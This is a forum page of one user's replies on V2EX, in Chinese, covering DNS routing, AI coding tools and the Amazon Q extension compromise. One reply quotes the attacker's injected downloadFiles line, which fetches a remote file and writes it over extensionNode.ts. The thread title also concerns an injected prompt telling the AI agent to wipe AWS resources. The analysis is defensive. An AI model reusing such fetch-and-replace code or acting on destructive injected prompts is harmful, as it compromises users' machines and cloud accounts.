V2EX › jqknono 的所有回复 › 第 6 页 / 共 22 页

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

现在注册

已注册用户请登录

1 ... 2 3 4 5 6 7 8 9 10 11 ... 22

❮

❯

2025 年 9 月 4 日

回复了 jqknono 创建的主题 › 程序员 › 整理文件的推荐方式

@niboy 手机相册重复备份了多次

@xclimbing 就两个硬盘位, 硬盘快满了

@Kenshiro Windows 媒体库能去重吗?

2025 年 9 月 4 日

回复了 RavelloH 创建的主题 › 分享创造 › 分享一个开源多语言 AI 自动翻译论坛

审美不错, 做挺好

2025 年 9 月 3 日

回复了 Jinnrry 创建的主题 › DNS › IOS 上 DNS 防污染的最佳姿势是怎样的？

需要分流, 试试 https://www.nullprivate.com , 自带 gfw 分流.
自部署: https://github.com/NullPrivate/NullPrivate

2025 年 9 月 2 日

回复了 guiyumin 创建的主题 › Cursor › cursor 是越来越不行了

没有用过 opus, openai gpt5 系列只有 gpt5high 有智力, gpt5high 比 sonnet 强非常多. 我主要用 codex, cursor 补全和备用.

2025 年 8 月 31 日

回复了 fanhaipeng0403 创建的主题 › 分享创造 › 开发了个 AI 编程开发者论坛，欢迎大家使用

得自己测一下在手机上的显示问题

2025 年 8 月 31 日

回复了 jqknono 创建的主题 › 分享创造 › [宁屏] 支持 DNS 分流规则的 AdguardHome

@mac100 懂行啊，支持的，设置 http_proxy 环境变量就能默认使 tcp/doh/dot 上游走代理，基于 udp 的目前还不支持走代理

2025 年 8 月 30 日

回复了 anyele 创建的主题 › 程序员 › 麻烦下次再说 ai 编程的时候提一句客户端和模型

@angrylid 麻烦说下客户端和模型

2025 年 8 月 29 日

回复了 jqknono 创建的主题 › 分享创造 › [宁屏] 支持 DNS 分流规则的 AdguardHome

@THESDZ 分流规则, 不只是分流.

2025 年 8 月 22 日

回复了 sss123 创建的主题 › 程序员 › R1-0528 已死，曾经沧海难为水，除却巫山不是云

R1 有很多供应商啊, 官方的我反而用的少, 官方的 R1 不知为何我一直只能一轮对话, 后来就没用了.

2025 年 8 月 21 日

回复了 javalaw2010 创建的主题 › Visual Studio Code › 学到了一个 vscode 的小技巧

@javalaw2010 对, 以前有 bug, 我也是用一阵没用了

2025 年 8 月 14 日

回复了 aotemannew 创建的主题 › 职场话题 › 这种情况，你们会怎么选择啊？

身体不好别冲了, 我的同学去世了一个, 三十来岁, 我去参加葬礼哭的稀里哗啦

2025 年 8 月 6 日

回复了 coer 创建的主题 › 程序员 › 真实安利 gemini cli，上下文巨大还免费，用起来很幸福🥰

@zenghaojim33 账号登陆是几十次, 用 key 目前是一天 1000 次请求, 我从来没用完过, /auth 会弹出说明.

2025 年 8 月 4 日

回复了 wjpauli 创建的主题 › Amazon Web Services › 国际版 cloudfront 哺育的站点，大陆可以稳定访问，我说的对吗？

闷声用吧, 我用几年了, aws 网络质量好, 也稳定. 网上没什么人分享, 我用免费套餐时发现的, 后来就续订了.

2025 年 8 月 2 日

回复了 my101du 创建的主题 › 程序员 › 最近使用几个 AI 编程模型的一点感受

很多人没试过 o3, 在网上风浪不大, o3 不适合一次性输出很多代码, 它很懒, 但是解决复杂问题独一档. 我的线程死锁问题只有 o3 能解.

2025 年 7 月 31 日

回复了 hanzichi 创建的主题 › 健康 › 喉咙持续痒了一个多月了，有没有这样的朋友？

慢炎舒宁含片, 我含这个睡第二天早上就不会喉咙痛, 可以试试, 对我很管用

2025 年 7 月 29 日

回复了 jqknono 创建的主题 › 程序员 › Amazon Q 的大瓜, 自动清理所有 AWS 资源, 欣赏一下注入的提示词

@skiy 我的意思是 reset hard 加 force push, 这样就没有恶意文件的痕迹. 否则一个公开库泄露了 accesskey, 岂不是没法彻底清理提交的内容了?

2025 年 7 月 29 日

回复了 jqknono 创建的主题 › 程序员 › Amazon Q 的大瓜, 自动清理所有 AWS 资源, 欣赏一下注入的提示词

@skiy 没明白, 这不是 force push 吗?

https://i.imgur.com/DMxJhmw.png

2025 年 7 月 29 日

回复了 jqknono 创建的主题 › 程序员 › Amazon Q 的大瓜, 自动清理所有 AWS 资源, 欣赏一下注入的提示词

为避免已更新到 v1.84.0 的用户被攻击, 无论如何 v1.84.0/extensionNode.bk 必须要删除, 否则已发布的代码会下载: https://raw.githubusercontent.com/aws/aws-toolkit-vscode/amazonq/v1.84.0/scripts/extensionNode.bk 替换 extensionNode.ts 然后执行.

也就是说 amazon 无论如何都要 force push 一次, 清掉 extensionNode.bk 这个文件.

extensionNode.bk 是否曾经真实存在过, 已成悬案.

但这行代码痕迹仍在,

downloadFiles([`https://raw.githubusercontent.com/${REPO_NAME}/${TAG_NAME}/scripts/extensionNode.bk`], "src/", "extensionNode.ts")

2025 年 7 月 29 日

回复了 jqknono 创建的主题 › 程序员 › Amazon Q 的大瓜, 自动清理所有 AWS 资源, 欣赏一下注入的提示词

@codehz @turygo @leir 给各位补充了代码库分析. 能实锤的是这个提交: https://github.com/aws/aws-toolkit-vscode/commit/678851bbe9776228f55e0460e66a6167ac2a1685

攻击者完成了第一步, 后续需要将恶意代码写到 extensionNode.bk, 可惜现在的确没有第二次提交的实证了.

medium.com 提到使用"Commit Trail"来确认第二次的提交, 需要在事发前后同步过该库的人查看, 新下载的 tag 已经看不到 extensionNode.bk 的提交.

@skiy 感谢分享, force push 是这个: https://github.com/aws/aws-toolkit-vscode/compare/215b32058086bb20bd2edc33c3d0dd624df1f449...4160c5baf630368edab09f7828f9d0f8ace6b527

force push 后 extensionNode.bk 的新建和删除记录就都没了.

1 ... 2 3 4 5 6 7 8 9 10 11 ... 22

❮

❯